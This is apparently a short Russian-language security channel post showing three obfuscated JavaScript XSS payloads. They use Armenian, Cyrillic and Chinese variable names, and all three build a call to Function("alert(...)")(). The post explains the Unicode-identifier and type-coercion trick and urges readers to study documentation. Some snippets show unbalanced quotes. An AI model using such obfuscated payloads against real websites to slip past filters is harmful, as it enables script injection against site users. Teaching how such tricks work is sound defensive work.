[ Интернациональные XSS ] Всем привет! 👋 Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках🔥 XSS по-армянски 🇦🇲 ա="",բ=!ա+ա,գ=!բ+ա,դ=ա+{},ե=բ[ա++],զ=բ[է=ա],ը=++է+ա,թ=դ[է+ը], բ[թ+=դ[ա]+(բ.գ+դ)[ա]+գ[ը]+ե+զ+բ[է]+թ+ե+դ[ա]+զ]թ")() XSS по-русски 🇷🇺 а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а], з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е]и")() XSS по-китайски 🇨🇳 甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲], 辛=++庚+甲,壬=丁[庚+辛], 乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己]壬" )() На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в Unicode (в том числе символы из различных алфавитов). А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов Function("alert('GigaHackers_text')")() Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии. Изучайте технологии фундаментально, не спешите, читайте man, и перед вами откроются новые двери🔍 @GigaHack #xss #obfuscation #web